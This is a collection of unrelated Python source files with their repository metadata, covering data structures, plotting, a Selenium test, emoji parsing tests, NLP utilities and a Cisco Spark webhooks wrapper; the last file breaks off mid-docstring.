79a75243a32e6932c69c6870f42fc84cb351e1fd
|
037c66d0ed5453cadc4acd5f98283c74e37b0a01
|
/isl_converter/video_processing/__init__.py
|
d1d6b677241279236ac5e88eeeafb40b62a83f2f
|
[] |
no_license
|
eshandhawan51/isl_convertor
|
f85670c1d1ec9a21e0d43070fa2c418ab29e130f
|
6d1453c4c15188e85d0afd3fa5ebbf1fd9ff9024
|
refs/heads/master
| 2023-02-11T23:19:36.950134 | 2021-01-01T07:58:24 | 2021-01-01T07:58:24 | 297,278,500 | 0 | 1 | null | 2020-10-02T21:35:02 | 2020-09-21T08:36:51 |
Python
|
UTF-8
|
Python
| false | false | 175 |
py
|
from isl_converter.video_processing.video_capture import *
from isl_converter.video_processing.image_transformation import *
__all__=["video_capture","image_transformation"]
|
[
"eshandhawan51@gmail.com"
] |
eshandhawan51@gmail.com
|
e997c10457a55e2fbfa26f1c3303499cfccde220
|
4f1b754089bd2a2b1cd60589fc52d0f188076551
|
/venv/bin/rdfs2dot
|
bf83243a1c042c7174c78d82fb98ec165e2a115b
|
[] |
no_license
|
haroun3amri/happyMealSparQL
|
52fae5ccf6662393f2eb8d61ef4e226b36ce45bd
|
f5a350f51daf57aff83bf6e084b9192f4ca612d1
|
refs/heads/master
| 2020-04-26T08:49:54.409081 | 2019-03-02T11:27:37 | 2019-03-02T11:27:37 | 173,435,791 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 266 |
#!/home/haroun3amri/PycharmProjects/untitled/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from rdflib.tools.rdfs2dot import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"haroun3mari@gmail.com"
] |
haroun3mari@gmail.com
|
|
6f45e31cd38fe22467cfb6b9bef6d61c3073ffef
|
38c76d29799896a8335bd83b6220acd71d5d8bed
|
/pyeuler/p053.py
|
32ec8ddbb6ba17ace49313419244944a5c2dde50
|
[] |
no_license
|
oozk/pyeuler
|
c010505624bb95043883faa55a776d954c0496dc
|
74fd549985722f6d53a1394179d094a106c70689
|
refs/heads/master
| 2023-04-13T17:50:23.187918 | 2023-04-05T13:00:44 | 2023-04-05T13:00:44 | 261,848,886 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 373 |
py
|
#!/usr/bin/env python3
###
# Problem 53
# https://projecteuler.net/problem=53
###
from math import factorial
def p053(l):
factorials = dict((i, factorial(i)) for i in range(0, l+1))
n_choose_r = lambda n, r: factorials[n] / factorials[r] / factorials[n-r]
return sum(1 for n in range(1, l+1) for r in range(1, n) if n_choose_r(n, r) > 1e6)
print(p053(100))
|
[
"onur.ozkan.1@gmail.com"
] |
onur.ozkan.1@gmail.com
|
5622afa65eec464402bf0814aa5c5b61c5dcd50b
|
71cfd1b92d701bea50ae38a8b257520e99076275
|
/lecture_01/materials/sample_project/calculator/calc.py
|
65c791e8112430f1cbabaa25a679fd6dce98b1c8
|
[
"MIT"
] |
permissive
|
arisend/epam_python_autumn_2020
|
fb7c66b4cc2cadcea32886d9c4169620e9a1b606
|
bc33ee6a2b4fd9a5502d7848fcdbe93970b1aa73
|
refs/heads/main
| 2023-09-02T13:55:32.063553 | 2021-11-07T18:31:15 | 2021-11-07T18:31:15 | 425,582,862 | 0 | 0 |
MIT
| 2021-11-09T18:45:13 | 2021-11-07T18:24:22 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 73 |
py
|
def check_power_of_2(a: int) -> bool:
return not (bool(a & (a - 1)))
|
[
"noreply@github.com"
] |
arisend.noreply@github.com
|
f217503815d23e66672cf76af9e8978e96ded141
|
1b5a2cfc319f1e8ddc3462ded94301fb4df0d799
|
/fig/curve.py
|
0e502ac51026d025be1d0b7127a12e186996bcc6
|
[] |
no_license
|
AnnaKarusevich/EffZeemana
|
5fe651e07a59faa0f44db0c53ffb96f3d4c1fc17
|
9e7bea9a829601f200031615586e101a930dd1cb
|
refs/heads/master
| 2020-04-09T02:44:50.621501 | 2018-12-01T14:25:41 | 2018-12-01T14:25:41 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 856 |
py
|
import matplotlib.pyplot as plt
from functions import parsing
from math import pi
import numpy as np
plt.rc('text', usetex=True)
plt.rc('text.latex', unicode=True)
plt.rc('text.latex', preamble=[r'\usepackage[utf8x]{inputenc}',
r'\usepackage[russian]{babel}',
r'\usepackage{amsmath}',
r'\usepackage{amssymb}'])
plt.rc('font', family='serif')
def f(x):
a= 6581
b=0.04164
c= -7785
d= -1.144
f=a*np.exp(b*x)+c*np.exp(d*x)
return f
x = np.linspace(0.4, 2.4, 1000)
plt.plot(x, f(x), 'darkblue')
plt.xlabel(r'I, $\text{мА}$', fontsize='16')
plt.ylabel(r'H, $\text{Эрстед}$', fontsize='16')
plt.minorticks_on()
plt.grid(which='major', linestyle='-')
plt.grid(which='minor', linestyle=':')
plt.savefig('D:/Labs/zeeman/fig/curve.pdf')
plt.show()
|
[
"annapurna.kar@mail.ru"
] |
annapurna.kar@mail.ru
|
3db0026a1e823dd188e9c24493bc95b80f214f06
|
e8aaff29a076a12838115976d70fb44cb5778a97
|
/proj/pipelines.py
|
f2bb8940ed08348ebb820ed23b0efdfd40692b79
|
[] |
no_license
|
roycocup/scrappertests
|
76ce080a45e25f22005cc78bbbfb8257fe9ddc74
|
835c07a3fd8bc683c3b6788a3ce3e1a748316ea5
|
refs/heads/master
| 2022-12-10T15:06:03.596633 | 2020-09-11T20:23:44 | 2020-09-11T20:23:44 | 294,805,287 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 358 |
py
|
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# useful for handling different item types with a single interface
from itemadapter import ItemAdapter
class ProjPipeline:
def process_item(self, item, spider):
return item
|
[
"rodrigo.pitta@gmail.com"
] |
rodrigo.pitta@gmail.com
|
bf4da77e6ed2f2440012c4f00d03d9e8f975a8c4
|
c77c09eecd35e4f0538a2bd170007ecdcc70405f
|
/examples/eonia_bootstrap.py
|
de6e6103fdeb1d1c598c10b11c54507260c659c7
|
[
"BSD-3-Clause"
] |
permissive
|
bill18/QuantLibExt
|
c0459646268f8248bda804e56ed8db26c2358c66
|
a6a1a23a2812830d9f32cd43e6a720913da5cb16
|
refs/heads/master
| 2020-06-26T18:54:11.142150 | 2019-08-10T11:26:07 | 2019-08-10T11:26:07 | 199,721,004 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,514 |
py
|
# Copyright (C) 2019 Wenhua Wang
#
# This file is part of QuantLibExt, which is an extension to the
# free-software/open-source quantitative library QuantLib - http://quantlib.org/
#
# QuantLibExt is free software: you can redistribute it and/or modify it
# under the terms of the BSD license.
#
# QuantLib's license is at <http://quantlib.org/license.shtml>.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the license for more details.
import matplotlib.pyplot as plt
from matplotlib.ticker import FuncFormatter
import datetime
import ext.CurveBuilder as builder
# import ext.Config as config
import ext.CurveUtils as cutil
def plotCurve(dates, values, lineType='-', width=10, height=9):
pydt = [datetime.datetime(d.year(), d.month(), d.dayOfMonth())
for d in dates]
fig, ax = plt.subplots()
fig.set_size_inches(width, height)
ax.yaxis.set_major_formatter(
FuncFormatter(lambda r, pos: '{:.2%}'.format(r)))
plt.subplots_adjust(bottom=0.2)
l, = plt.plot(pydt, values, lineType)
plt.show()
if __name__ == '__main__':
asOfDate = 20121211
basis = 'Act/365F'
curve = builder.PiecewiseLogCubicDiscountCurve(
asOfDate, basis, 'eonia')
data = cutil.oneDayForwardRates(curve, '2Y', 'TGT', compounding='Simple')
dates = data['dates']
rates = data['rates']
plotCurve(dates, rates, '.')
|
[
"fin.hcny@gmail.com"
] |
fin.hcny@gmail.com
|
ecd2249faf1ca2634b98e90a4a525d713f473543
|
233297266196f9f249d7e4bace933785fe1c2691
|
/linked_lists/doubly_linked_list.py
|
40d21fd4bc1aab7cf802b33e365ea355731311ff
|
[
"MIT"
] |
permissive
|
a-churchill/miscellaneous-code
|
9f7d6527259d655c668da1b5c2c741acca111a92
|
cdb88783f39e1b9a89fdb12f7cddfe62619e4357
|
refs/heads/master
| 2021-10-10T18:16:51.449009 | 2019-01-15T05:34:30 | 2019-01-15T05:34:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,763 |
py
|
# structure of a node in a doubly linked list
class Node:
def __init__(self, val, next_node=None, prev_node=None):
"""
Node constructor, next and prev are optional
"""
self.val = val
self.next_node = next_node
self.prev_node = prev_node
def __str__(self):
nn = "None" if self.next_node is None else str(self.next_node.val)
pn = "None" if self.prev_node is None else str(self.prev_node.val)
return "(Value: {0}, Next: {1}, Prev: {2})".format(self.val, nn, pn)
class MyLinkedList:
def __init__(self):
"""
Initialize your data structure here.
"""
self.head = None
self.tail = None
self.length = 0
def get(self, index):
"""
Get the value of the index-th node in the linked list.
If the index is invalid, return -1.
:type index: int
:rtype: int
"""
current = self.getNodeAtIndex(index)
# print("Node retrieved: {0}".format(str(current)))
if current is None:
return -1
else:
return current.val
def addAtHead(self, val):
"""
Add a node of value val before the first element of the linked list.
After the insertion, the new node will be the first node
of the linked list.
:type val: int
:rtype: void
"""
new_head = Node(val, self.head, None)
if self.length == 0:
self.tail = new_head
else:
self.head.prev_node = new_head
self.head = new_head
self.length += 1
# print("Head: {0}".format(str(self.head)))
# print("addAtHead result: {0}".format(str(self)))
return
def addAtTail(self, val):
"""
Append a node of value val to the last element of the linked list.
:type val: int
:rtype: void
"""
new_tail = Node(val, None, self.tail)
if self.length == 0:
self.head = new_tail
else:
self.tail.next_node = new_tail
self.tail = new_tail
self.length += 1
# print("addAtTail result: {0}".format(str(self)))
return
def addAtIndex(self, index, val):
"""
Add a node of value val before the index-th node in the linked list.
If index equals to the length of linked list,
the node will be appended to the end of linked list.
If index is greater than the length, the node will not be inserted.
:type index: int
:type val: int
:rtype: void
"""
# if index is 0, add at head
if index == 0:
self.addAtHead(val)
return
elif index == self.length:
self.addAtTail(val)
return
current = self.getNodeAtIndex(index)
# current is set, now need to insert directly after it
if current is None:
return
current = current.prev_node
nn = Node(val, current.next_node, current)
current.next_node = nn
nn.next_node.prev_node = nn
self.length += 1
# print("addAtIndex result: {0}".format(str(self)))
return
def deleteAtIndex(self, index):
"""
Delete the index-th node in the linked list, if the index is valid.
:type index: int
:rtype: void
"""
# validate input
if index < 0:
return
elif index >= self.length:
return
# gets node to delete, updates references around it
to_del = self.getNodeAtIndex(index)
if to_del is None:
return
prevn = to_del.prev_node
nextn = to_del.next_node
if prevn is None: # to_del is the head
if nextn is None: # list only has 1 elem
self.head = None
self.tail = None
else:
self.head = nextn
nextn.prev_node = None
elif nextn is None: # to_del is the tail
self.tail = prevn
prevn.next_node = None
else: # to_del is in the middle of the list
prevn.next_node = nextn
nextn.prev_node = prevn
self.length -= 1
return
def getNodeAtIndex(self, index):
"""
Gets the node object at the given index
O(1) at the edges, approaches O(n) in the middle
(uses double sided nature)
:type index: int
:rtype: Node
"""
# check input
if index >= self.length:
return None
elif index < 0:
return None
# if element is closer to right side; better performance this way
if index > self.length // 2:
current = self.tail
for i in range(self.length - 1, index, -1):
if current is None:
return -1
current = current.prev_node
# if element is closer to left side
else:
current = self.head
for i in range(index):
if current is None:
return -1
current = current.next_node
return current
# defines string representation of list
def __str__(self):
result = []
current = self.head
while current is not None:
result.append(current.val)
current = current.next_node
return "MyLinkedList({0}, length {1})".format(str(result),
str(self.length))
# What is tested:
# obj = MyLinkedList()
# param_1 = obj.get(index)
# obj.addAtHead(val)
# obj.addAtTail(val)
# obj.addAtIndex(index,val)
# obj.deleteAtIndex(index)
|
[
"chu.andrew.8@outlook.com"
] |
chu.andrew.8@outlook.com
|
873d1bcf8038fd8eba8a27027fd251e6cd57bec6
|
aa96174a0bc7d87dec082e6be810930d48c431c2
|
/test_case/test_youdao.py
|
12b57c6de78e88310f777cd9460c9c7176c85934
|
[] |
no_license
|
nicoleghuang/selenium_use_case
|
d1197b4674bf65e28905cd27e78e0ebb316532f4
|
c374e43097adc23689cdf6ce555b23208ffe16d4
|
refs/heads/master
| 2021-09-20T22:54:16.303331 | 2018-08-16T07:55:33 | 2018-08-16T07:55:33 | 106,635,838 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,629 |
py
|
#coding=utf-8
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import NoSuchElementException
import unittest,time,re
import HTMLTestRunner
now=time.strftime("%Y-%m-%d %H-%M-%S",time.localtime())
#print now
class YouDao(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Chrome()
self.driver.implicitly_wait(30)
self.base_url="http://www.youdao.com/"
self.verificationError=[]
self.accept_next_alert = True
def test_youdao_search(self):
u"""有道搜索用例"""
driver=self.driver
driver.get(self.base_url+"/")
try:
driver.find_element_by_id("qw").send_keys("viabtc")
driver.find_element_by_id("query").click()
time.sleep(5)
except:
driver.get_screenshot_as_file('D:\\selenium_use_case\\error_png\\'+now+'.png')
driver.close()
def tearDown(self):
self.driver.quit()
self.assertEqual([],self.verificationError)
if __name__=="__main__":
#HTMLTestRunner.main()
#unittest.main()
testsuite=unittest.TestSuite
testsuite.addTest(YouDao("test_youdao_search"))
unittest.TextTestRunner().run(testsuite)
#filename='D:\\selenium_use_case\\report\\'+now+'_result.html'
#fp=file(filename,'wb')
#runner=HTMLTestRunner.HTMLTestRunner(stream=fp,title="test_report",description="this is the description of this report")
#runner.run(testsuite)
|
[
"noreply@github.com"
] |
nicoleghuang.noreply@github.com
|
d8a83a203ad3e39efa214b7786b7be640e6c5c2d
|
af192ea16aad4264a92039d594d72acca91d0e33
|
/tests/tests.py
|
d329884aa00948981f710044b18f363c5eea0ca8
|
[
"MIT"
] |
permissive
|
TakumiHQ/emoji-unicode
|
ceed81325829e2c44b6d1b04c4dbc7257cc95c86
|
85e8193f05f822641a58eb539b765481b084f83c
|
refs/heads/master
| 2021-01-18T16:08:52.817116 | 2015-11-20T13:10:44 | 2015-11-20T13:10:44 | 66,449,921 | 1 | 0 | null | 2016-08-24T09:17:27 | 2016-08-24T09:17:27 | null |
UTF-8
|
Python
| false | false | 6,812 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
import logging
import os
import json
import io
from emoji_unicode import replace, normalize, Emoji
from emoji_unicode.utils import code_point_to_unicode, unicode_to_code_point
from emoji_unicode import data_parser
logging.disable(logging.CRITICAL)
DIR = os.path.dirname(__file__)
FIXTURES = os.path.join(DIR, 'fixtures')
EMOJI_PRETTY_JSON = None
def _get_emoji_pretty():
global EMOJI_PRETTY_JSON
if EMOJI_PRETTY_JSON is not None:
return EMOJI_PRETTY_JSON
with io.open(os.path.join(FIXTURES, 'emoji_pretty.json'), encoding='utf-8') as fh:
EMOJI_PRETTY_JSON = fh.read()
return EMOJI_PRETTY_JSON
def get_emoji_pretty():
return json.loads(_get_emoji_pretty())
def code_points_to_unicode(code_points):
return ''.join(
code_point_to_unicode(p)
for p in code_points.split('-')
)
def get_emojis(include_skin_variations=True, include_variations=True):
# todo: include variations (emoji + emo_variation), android doesn't use them, check iOS
emojis = []
for e in get_emoji_pretty():
emojis.append({
'unicode': code_points_to_unicode(e['unified']),
'code_point': e['unified'],
'short_name': e['short_name']
})
if include_skin_variations:
emojis.extend(
{
'unicode': code_points_to_unicode(point),
'code_point': point,
'short_name': e['short_name']
}
for point in e.get('skin_variations', {}).keys()
)
if include_variations:
emojis.extend(
{
'unicode': code_points_to_unicode(point),
'code_point': point,
'short_name': e['short_name']
}
for point in e.get('variations', [])
)
return emojis
def get_emojis_unicode(**kw):
return [e['unicode'] for e in get_emojis(**kw)]
class MetaTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_code_points_to_unicode(self):
self.assertEqual(
code_points_to_unicode('1F58B-1F58B-1F58B'),
'\U0001f58b\U0001f58b\U0001f58b'
)
def test_get_emojis(self):
self.assertEqual(len(get_emojis()), 1736)
self.assertEqual(len(get_emojis(include_skin_variations=False)), 1416)
self.assertEqual(len(get_emojis(include_variations=False)), 1619)
def test_get_emojis_unicode(self):
self.assertEqual(len(get_emojis_unicode()), 1736)
self.assertEqual(len(get_emojis_unicode(include_skin_variations=False)), 1416)
self.assertEqual(len(get_emojis(include_variations=False)), 1619)
class UtilsTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_code_point_to_unicode(self):
self.assertEqual(
code_point_to_unicode('1F58B'),
'\U0001f58b'
)
def test_unicode_to_code_point(self):
self.assertEqual(
unicode_to_code_point('\U0001f58b'),
'1F58B'.lower()
)
class ModelEmojiTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_unicode(self):
emoji = Emoji(unicode='foo')
self.assertEqual(emoji.unicode, 'foo')
def test_code_points(self):
emoji = Emoji(unicode='\U0001f58b\U0001f58b\U0001f58b\uFE0F\u200D')
self.assertEqual(emoji.code_points, '1F58B-1F58B-1F58B'.lower())
def test_as_map(self):
emoji = Emoji(unicode='\U0001f58b\U0001f58b\U0001f58b\uFE0F\u200D')
self.assertEqual(
emoji.as_map(),
[('\U0001f58b', '1f58b'), ('\U0001f58b', '1f58b'), ('\U0001f58b', '1f58b')]
)
class ParserTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_replace(self):
"""
It should replace all emojis
"""
emojis = get_emojis()
# With no spaces will fail due to fitzpatrick tone being a modifier and also a emoji
txt = ' '.join(get_emojis_unicode())
txt_code_points = ' '.join(normalize(e['code_point']) for e in emojis)
res = replace(txt, lambda emoji: emoji.code_points)
self.assertEqual(res, txt_code_points)
def test_replace_with_no_fitz(self):
"""
It should replace no-spaced emojis, excluding fitzpatrick tone emojis
"""
emojis = get_emojis()
txt = ''.join(
e['unicode']
for e in emojis
if 'skin-tone' not in e['short_name']
)
txt_code_points = ''.join(
normalize(e['code_point'])
for e in emojis
if 'skin-tone' not in e['short_name']
)
res = replace(txt, lambda emoji: emoji.code_points)
self.assertEqual(res, txt_code_points)
def test_replace_remove(self):
txt = ''.join(get_emojis_unicode())
res = replace(txt, lambda emoji: '')
self.assertEqual(res, '')
def test_replace_digits(self):
"""
It should not match single digits
"""
txt = '#*0123456789'
res = replace(txt, lambda emoji: '')
self.assertEqual(res, txt)
def test_replace_text_variations(self):
"""
It should not match emojis with text variation
"""
txt = '\u203C\uFE0E'
res = replace(txt, lambda emoji: '')
self.assertEqual(res, txt)
def test_normalize(self):
self.assertEqual(normalize('00A900'), 'a900')
def test_normalize_variations(self):
self.assertEqual(normalize('00A9-FE0F-200D-F00'), 'a9-f00')
def test_normalize_separator(self):
self.assertEqual(normalize('00A9_FE0F_200D_F00', separator='_'), 'a9_f00')
class DataParserTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_parse(self):
res = set(data_parser.parse())
self.assertTrue('\u00A9' in res)
self.assertTrue('\u2194-\u2199' in res) # range
def test_read_template(self):
template = data_parser.read_template()
self.assertTrue('{{code_points}}' in template)
self.assertTrue('RE_PATTERN_TEMPLATE' in template)
def test_render_template(self):
code_points = data_parser.parse()
template = data_parser.read_template()
rendered_template = data_parser.render_template(template, code_points)
self.assertTrue('{{code_points}}' not in rendered_template)
self.assertTrue('RE_PATTERN_TEMPLATE' in rendered_template)
|
[
"ecastroborsani@gmail.com"
] |
ecastroborsani@gmail.com
|
81692c3527f89a21d770bcf0dfe69059814ffe59
|
64f5c0f229e1b1186f12d75b4ba21c07adfcf152
|
/index/models.py
|
fc2791e3989c627bacd03d10534b92d43824f717
|
[] |
no_license
|
Emehinola/intouch
|
22dd3a81c935956914362604b8fd60d6d7cd2a46
|
d370a48c21b93aed797c32a0621c3fa8bda89857
|
refs/heads/master
| 2023-01-24T22:37:41.862324 | 2020-12-13T08:54:55 | 2020-12-13T08:54:55 | 318,006,792 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 397 |
py
|
from django.db import models
# Create your models here.
# home page view, i.e the surveys views
class HomeViewCount(models.Model):
views = models.IntegerField(default=0) # number of views or visits
time = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ['-time']
verbose_name_plural = 'Views'
def __str__(self):
return f'{self.views}'
|
[
"emehinolasam01@gmail.com"
] |
emehinolasam01@gmail.com
|
c2e80a38a785c88209976e926fc65e085e4e529a
|
6ffd3ef2b5286348b9150141bdd5c1dcd1a24a7a
|
/seaqube/nlp/tools.py
|
fd96f685357633f9b9e925f35ed06d20974c5258
|
[
"MIT"
] |
permissive
|
bees4ever/seaqube
|
f08ea505ee2d360e358e507276de0d80e7b0dbb7
|
51bfe8f07574a7d5bf365c7e707646b59b623244
|
refs/heads/master
| 2023-02-26T23:40:09.143495 | 2021-01-28T19:08:04 | 2021-01-28T19:08:04 | 296,326,813 | 2 | 1 |
MIT
| 2021-01-15T12:08:25 | 2020-09-17T12:58:07 |
Python
|
UTF-8
|
Python
| false | false | 3,646 |
py
|
"""
Copyright (c) 2021 by Benjamin Manns
This file is part of the Semantic Quality Benchmark for Word Embeddings Tool in Python (SeaQuBe).
:author: Benjamin Manns
The nlp tool-kit which makes it possible to do text and doc loading, saving, processing in one-liners.
"""
from collections import Counter
from copy import deepcopy
from collections import Iterable
from seaqube.nlp.types import SeaQuBeWordEmbeddingsModelGensim, BackgroundScheduler, SeaQuBeWordEmbeddingsModelC2V
from seaqube.package_config import log
from nltk import word_tokenize
from nltk.tokenize.treebank import TreebankWordDetokenizer
from progressbar import progressbar
anti_tokenizer = TreebankWordDetokenizer()
def word_count_list(double_list):
"""
Create a word count list of a corpus in doc format.
"""
word_count = Counter()
for sentence in double_list:
for token in sentence:
word_count[token] += 1 # Equivalently, token.text
return word_count
def gensim_we_model_to_custom_we_model(gensim_model):
return SeaQuBeWordEmbeddingsModelGensim(gensim_model)
def c2_we_model_to_custom_we_model(c2v_model):
return SeaQuBeWordEmbeddingsModelC2V(c2v_model)
class DelayedListToJSONWriter:
"""
@deprecated
Write buffer of corpus down, while not preserving gig's of text in RAM.
"""
def __init__(self, file_path, buffer_size=10):
self.path = file_path
self.buffer = []
self.buffer_size = buffer_size
self._in_write_mode = False
self.background_scheduler = BackgroundScheduler()
self.background_scheduler.start()
self.background_scheduler.local_scheduler.every(5).minutes.do(self.__save_on_disk)
def finalize(self):
log.debug(f"{self.__class__.__name__}: finalize is entered now")
self.background_scheduler.stop()
self.buffer_size = 0
self.__save_on_disk()
self.background_scheduler.join()
def __save_on_disk(self):
if not self._in_write_mode:
self._in_write_mode = True
log.debug("Check, save on disk")
data = []
if len(self.buffer) >= self.buffer_size:
buffer_copy = deepcopy(self.buffer)
self.buffer = []
## we make a fake json, but it is efficient
#if exists(self.path):
# data = load_json(self.path)
#data += self.buffer
#self.buffer = []
#save_json(data, self.path)
with open(self.path, "a") as f:
f.write(json.dumps(buffer_copy) + "\n")
log.debug("DelayedListToJSONWriter: write to file")
self._in_write_mode = False
def add(self, elem):
self.buffer.append(elem)
def tokenize_corpus(sentences: Iterable, verbose=True):
"""
Tokenize a list of texts.
"""
if verbose:
sentences = progressbar(sentences)
return [[token.lower() for token in word_tokenize(sentence) if token.isspace() is False] for sentence in sentences]
def sentenceize_corpus(token_list: list, verbose=True):
"""
Reverse tokenization and transform a corpus again as a list of texts.
"""
if verbose:
token_list = progressbar(token_list)
return [anti_tokenizer.detokenize(tokens) for tokens in token_list]
def unique_2d_list(list_: list):
"""
Only keep those lists inside the big list which are unique.
Args:
list_: list of list where second dimension can contain duplicates
Returns:
"""
return list(map(lambda x: list(x), set(map(lambda x: tuple(x), list_))))
|
[
"beesforever@gmx.de"
] |
beesforever@gmx.de
|
800d88fb5ae5695580acd4ab58b82b3d63b220d0
|
0cc4c5c6b309f40872d9d744fe1ab7aae9f6060f
|
/demo_chainmap.py
|
f3d00e0c8f8b639e7bd2fa7c81de832b9d38745f
|
[] |
no_license
|
Vigneshpandiyan600/Pythonfiles
|
aed22c7a2a9c47ee34d6b54cfc222b62e95de480
|
755ab463dc726b30204008cdcd58623fc8ec061e
|
refs/heads/master
| 2022-11-23T22:12:16.617346 | 2020-07-29T03:44:23 | 2020-07-29T03:44:23 | 283,381,135 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 236 |
py
|
from collections import ChainMap
dict1 = {'a':1, 'b':4}
dict2 = {'b':5, 'c':7}
cmap = ChainMap(dict1, dict2)
print(cmap)
for i in cmap.maps:
print(i)
for i in cmap.keys():
print(i)
for i in cmap.values():
print(i)
|
[
"noreply@github.com"
] |
Vigneshpandiyan600.noreply@github.com
|
5d0b9300f93e0f589d3e8b6b06b1dabd9844b08d
|
8a5ce1b7864881a516edabafa7b9388d27b53c6d
|
/music_app/views/artists.py
|
39c61cae6e109acb13ec4817bb28708f201c6d11
|
[
"MIT"
] |
permissive
|
ryzenboi98/music-app
|
84c4666624aad0c1f1f336f6c625491a0a606c4f
|
955417c1b4021bf1b757d55f7a1ec9d56a5596e2
|
refs/heads/main
| 2023-08-12T20:38:56.432150 | 2021-10-07T10:16:03 | 2021-10-07T10:16:03 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 521 |
py
|
from music_app.models import Artist
from rest_framework import viewsets, permissions
from music_app import serializers
class UserReadOnlyPermissions(permissions.BasePermission):
def has_permission(self, request, view):
return request.method in permissions.SAFE_METHODS or request.user.is_superuser
class ArtistViewSet(viewsets.ModelViewSet, UserReadOnlyPermissions):
permission_classes = [UserReadOnlyPermissions]
queryset = Artist.objects.all()
serializer_class = serializers.ArtistSerializer
|
[
"joaopro23@gmail.com"
] |
joaopro23@gmail.com
|
2372907ce176df44c3d9cbf02069995888b6c576
|
27694cb6497b948e9e6f6ce858cec6782adace01
|
/ciscosparkapi/api/webhooks.py
|
fedacf258a38092351d394b4f6a3c4605770a7a9
|
[
"MIT"
] |
permissive
|
marsivo/ciscosparkapi
|
780a087127f3c9c9c44707e4e4839eeae33a732b
|
f5ea6f4a8e1a9a90feb601ef3433c2dad7cd703f
|
refs/heads/master
| 2021-01-21T18:57:38.492342 | 2016-09-19T09:02:39 | 2016-09-19T09:02:39 | 68,586,837 | 0 | 0 | null | 2016-09-19T08:47:46 | 2016-09-19T08:47:46 | null |
UTF-8
|
Python
| false | false | 9,321 |
py
|
"""Cisco Spark Webhooks-API wrapper classes.
Classes:
Webhook: Models a Spark 'webhook' JSON object as a native Python object.
WebhooksAPI: Wrappers the Cisco Spark Webhooks-API and exposes the API
calls as Python method calls that return native Python objects.
"""
from ciscosparkapi.exceptions import ciscosparkapiException
from ciscosparkapi.helper import utf8, generator_container
from ciscosparkapi.restsession import RestSession
from ciscosparkapi.sparkdata import SparkData
class Webhook(SparkData):
"""Model a Spark 'webhook' JSON object as a native Python object."""
def __init__(self, json):
"""Init a new Webhook data object from a JSON dictionary or string.
Args:
json(dict, unicode, str): Input JSON object.
Raises:
TypeError: If the input object is not a dictionary or string.
"""
super(Webhook, self).__init__(json)
@property
def id(self):
"""Webhook ID."""
return self._json.get(u'id')
@property
def name(self):
"""A user-friendly name for this webhook."""
return self._json.get(u'name')
@property
def targetUrl(self):
"""The URL that receives POST requests for each event."""
return self._json.get(u'targetUrl')
@property
def resource(self):
"""The resource type for the webhook."""
return self._json.get(u'resource')
@property
def event(self):
"""The event type for the webhook."""
return self._json.get(u'event')
@property
def filter(self):
"""The filter that defines the webhook scope."""
return self._json.get(u'filter')
@property
def secret(self):
"""Secret used to generate payload signature."""
return self._json.get(u'secret')
@property
def created(self):
"""Creation date and time in ISO8601 format."""
return self._json.get(u'created')
@property
def data(self):
"""The object representation of the resource triggering the webhook.
The data property contains the object representation of the resource
that triggered the webhook. For example, if you registered a webhook
that triggers when messages are created (i.e. posted into a room) then
the data property will contain the representation for a message
resource, as specified in the Messages API documentation.
"""
object_data = self._json.get(u'data', None)
if object_data:
return SparkData(object_data)
else:
return None
class WebhooksAPI(object):
"""Cisco Spark Webhooks-API wrapper class.
Wrappers the Cisco Spark Webhooks-API and exposes the API calls as Python
method calls that return native Python objects.
Attributes:
session(RestSession): The RESTful session object to be used for API
calls to the Cisco Spark service.
"""
def __init__(self, session):
"""Init a new WebhooksAPI object with the provided RestSession.
Args:
session(RestSession): The RESTful session object to be used for
API calls to the Cisco Spark service.
Raises:
AssertionError: If the parameter types are incorrect.
"""
assert isinstance(session, RestSession)
super(WebhooksAPI, self).__init__()
self.session = session
@generator_container
def list(self, max=None):
"""List all of the authenticated user's webhooks.
This method supports Cisco Spark's implementation of RFC5988 Web
Linking to provide pagination support. It returns a generator
container that incrementally yields all webhooks returned by the
query. The generator will automatically request additional 'pages' of
responses from Spark as needed until all responses have been returned.
The container makes the generator safe for reuse. A new API call will
be made, using the same parameters that were specified when the
generator was created, every time a new iterator is requested from the
container.
Args:
max(int): Limits the maximum number of webhooks returned from the
Spark service per request.
Yields:
Webhook: The the next webhook from the Cisco Spark query.
Raises:
AssertionError: If the parameter types are incorrect.
SparkApiError: If the Cisco Spark cloud returns an error.
"""
# Process args
assert max is None or isinstance(max, int)
params = {}
if max:
params[u'max'] = max
# API request - get items
items = self.session.get_items('webhooks', params=params)
# Yield Webhook objects created from the returned items JSON objects
for item in items:
yield Webhook(item)
def create(self, name, targetUrl, resource, event,
filter=None, secret=None):
"""Create a webhook.
Args:
name(unicode, str): A user-friendly name for this webhook.
targetUrl(unicode, str): The URL that receives POST requests for
each event.
